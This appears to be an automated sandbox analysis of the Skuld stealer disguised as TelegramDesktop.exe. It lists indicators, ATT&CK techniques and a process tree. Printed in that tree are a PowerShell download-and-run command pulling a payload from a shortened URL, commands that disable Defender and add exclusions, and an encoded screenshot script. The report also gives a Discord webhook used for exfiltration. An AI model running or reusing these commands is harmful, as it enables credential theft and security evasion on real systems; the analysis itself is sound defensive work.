skuld | 6bf297bef2431e24bbbbca085f5774593ae2bce6ada433d59259c5608ad37dcb

Analysis

max time kernel
137s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
21-07-2024 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TelegramDesktop.exe
Size

310KB
MD5

d284f1ffcf65941c59498f41de410168
SHA1

404ec1fca6c6b442e2751d90cdf5cadd76395076
SHA256

6bf297bef2431e24bbbbca085f5774593ae2bce6ada433d59259c5608ad37dcb
SHA512

c25381a6b43b06905ab735f8bf21cae045d010c557f936a0aed3e173080f33d1a2eac17a4b129f972e3a4da674ff37c6c0c35c1dd28ac91ffbcd99d8ae4d8d47
SSDEEP

6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40XIQ:IzxzTDWikLSb4NS7t2X+t40XIQ

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/mmtffwh6

Extracted

Family

skuld

https://discord.com/api/webhooks/1264554977548959744/oC53YCw85zYhcirGtr-tguubwfkNi6K13nKw05hZvFcoP9Rq_6cKfDH030-fMLXLn3RB

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Blocklisted process makes network request 2 IoCs

flow	pid	Process
21	396	powershell.exe
23	396	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
396	powershell.exe
3604	powershell.exe
2020	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	file.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	TelegramDesktop.exe

Executes dropped EXE 1 IoCs

pid	Process
3564	file.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	discord.com
31	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3856	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1108	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	35	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c00000001000000040000000008000019000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	file.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
396	powershell.exe
396	powershell.exe
3564	file.exe
3564	file.exe
3564	file.exe
3564	file.exe
3564	file.exe
3564	file.exe
2020	powershell.exe
2020	powershell.exe
748	powershell.exe
748	powershell.exe
3604	powershell.exe
3604	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	3564	file.exe
Token: SeIncreaseQuotaPrivilege	1140	wmic.exe
Token: SeSecurityPrivilege	1140	wmic.exe
Token: SeTakeOwnershipPrivilege	1140	wmic.exe
Token: SeLoadDriverPrivilege	1140	wmic.exe
Token: SeSystemProfilePrivilege	1140	wmic.exe
Token: SeSystemtimePrivilege	1140	wmic.exe
Token: SeProfSingleProcessPrivilege	1140	wmic.exe
Token: SeIncBasePriorityPrivilege	1140	wmic.exe
Token: SeCreatePagefilePrivilege	1140	wmic.exe
Token: SeBackupPrivilege	1140	wmic.exe
Token: SeRestorePrivilege	1140	wmic.exe
Token: SeShutdownPrivilege	1140	wmic.exe
Token: SeDebugPrivilege	1140	wmic.exe
Token: SeSystemEnvironmentPrivilege	1140	wmic.exe
Token: SeRemoteShutdownPrivilege	1140	wmic.exe
Token: SeUndockPrivilege	1140	wmic.exe
Token: SeManageVolumePrivilege	1140	wmic.exe
Token: 33	1140	wmic.exe
Token: 34	1140	wmic.exe
Token: 35	1140	wmic.exe
Token: 36	1140	wmic.exe
Token: SeIncreaseQuotaPrivilege	1140	wmic.exe
Token: SeSecurityPrivilege	1140	wmic.exe
Token: SeTakeOwnershipPrivilege	1140	wmic.exe
Token: SeLoadDriverPrivilege	1140	wmic.exe
Token: SeSystemProfilePrivilege	1140	wmic.exe
Token: SeSystemtimePrivilege	1140	wmic.exe
Token: SeProfSingleProcessPrivilege	1140	wmic.exe
Token: SeIncBasePriorityPrivilege	1140	wmic.exe
Token: SeCreatePagefilePrivilege	1140	wmic.exe
Token: SeBackupPrivilege	1140	wmic.exe
Token: SeRestorePrivilege	1140	wmic.exe
Token: SeShutdownPrivilege	1140	wmic.exe
Token: SeDebugPrivilege	1140	wmic.exe
Token: SeSystemEnvironmentPrivilege	1140	wmic.exe
Token: SeRemoteShutdownPrivilege	1140	wmic.exe
Token: SeUndockPrivilege	1140	wmic.exe
Token: SeManageVolumePrivilege	1140	wmic.exe
Token: 33	1140	wmic.exe
Token: 34	1140	wmic.exe
Token: 35	1140	wmic.exe
Token: 36	1140	wmic.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4336	wmic.exe
Token: SeSecurityPrivilege	4336	wmic.exe
Token: SeTakeOwnershipPrivilege	4336	wmic.exe
Token: SeLoadDriverPrivilege	4336	wmic.exe
Token: SeSystemProfilePrivilege	4336	wmic.exe
Token: SeSystemtimePrivilege	4336	wmic.exe
Token: SeProfSingleProcessPrivilege	4336	wmic.exe
Token: SeIncBasePriorityPrivilege	4336	wmic.exe
Token: SeCreatePagefilePrivilege	4336	wmic.exe
Token: SeBackupPrivilege	4336	wmic.exe
Token: SeRestorePrivilege	4336	wmic.exe
Token: SeShutdownPrivilege	4336	wmic.exe
Token: SeDebugPrivilege	4336	wmic.exe
Token: SeSystemEnvironmentPrivilege	4336	wmic.exe
Token: SeRemoteShutdownPrivilege	4336	wmic.exe
Token: SeUndockPrivilege	4336	wmic.exe
Token: SeManageVolumePrivilege	4336	wmic.exe
Token: 33	4336	wmic.exe
Token: 34	4336	wmic.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 3548 wrote to memory of 208	3548	TelegramDesktop.exe	85
PID 3548 wrote to memory of 208	3548	TelegramDesktop.exe	85
PID 3548 wrote to memory of 208	3548	TelegramDesktop.exe	85
PID 208 wrote to memory of 4040	208	cmd.exe	88
PID 208 wrote to memory of 4040	208	cmd.exe	88
PID 208 wrote to memory of 4040	208	cmd.exe	88
PID 4040 wrote to memory of 396	4040	cmd.exe	90
PID 4040 wrote to memory of 396	4040	cmd.exe	90
PID 4040 wrote to memory of 396	4040	cmd.exe	90
PID 4040 wrote to memory of 3856	4040	cmd.exe	98
PID 4040 wrote to memory of 3856	4040	cmd.exe	98
PID 4040 wrote to memory of 3856	4040	cmd.exe	98
PID 4040 wrote to memory of 3564	4040	cmd.exe	100
PID 4040 wrote to memory of 3564	4040	cmd.exe	100
PID 3564 wrote to memory of 1888	3564	file.exe	102
PID 3564 wrote to memory of 1888	3564	file.exe	102
PID 3564 wrote to memory of 2020	3564	file.exe	103
PID 3564 wrote to memory of 2020	3564	file.exe	103
PID 3564 wrote to memory of 1140	3564	file.exe	104
PID 3564 wrote to memory of 1140	3564	file.exe	104
PID 3564 wrote to memory of 4460	3564	file.exe	105
PID 3564 wrote to memory of 4460	3564	file.exe	105
PID 3564 wrote to memory of 4336	3564	file.exe	106
PID 3564 wrote to memory of 4336	3564	file.exe	106
PID 3564 wrote to memory of 1108	3564	file.exe	107
PID 3564 wrote to memory of 1108	3564	file.exe	107
PID 3564 wrote to memory of 748	3564	file.exe	108
PID 3564 wrote to memory of 748	3564	file.exe	108
PID 3564 wrote to memory of 4756	3564	file.exe	109
PID 3564 wrote to memory of 4756	3564	file.exe	109
PID 3564 wrote to memory of 4888	3564	file.exe	110
PID 3564 wrote to memory of 4888	3564	file.exe	110
PID 3564 wrote to memory of 3608	3564	file.exe	111
PID 3564 wrote to memory of 3608	3564	file.exe	111
PID 3564 wrote to memory of 4912	3564	file.exe	112
PID 3564 wrote to memory of 4912	3564	file.exe	112
PID 3564 wrote to memory of 3604	3564	file.exe	114
PID 3564 wrote to memory of 3604	3564	file.exe	114
PID 3604 wrote to memory of 4060	3604	powershell.exe	115
PID 3604 wrote to memory of 4060	3604	powershell.exe	115
PID 4060 wrote to memory of 2216	4060	csc.exe	116
PID 4060 wrote to memory of 2216	4060	csc.exe	116

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1888	attrib.exe
4460	attrib.exe
4888	attrib.exe
3608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\TelegramDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\TelegramDesktop.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper (2) - Copy.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K rattesting.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$webClient = New-Object System.Net.WebClient; try { $webClient.DownloadFile('https://tinyurl.com/mmtffwh6', 'file.exe') } catch { Write-Host 'Error downloading file:' $_.Exception.Message; exit 1 }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:396
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3
      4⤵
      Delays execution with timeout.exe
      PID:3856
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3564
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        5⤵
        Views/modifies file attributes
        
        PID:1888
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:4460
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4336
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:748
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:4756
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4888
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3608
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3604
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ont2pf5\0ont2pf5.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4060
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1BC.tmp" "c:\Users\Admin\AppData\Local\Temp\0ont2pf5\CSCB21CFF1AC74949EE8F51A2F3ABD35BA8.TMP"
        7⤵
        
        PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
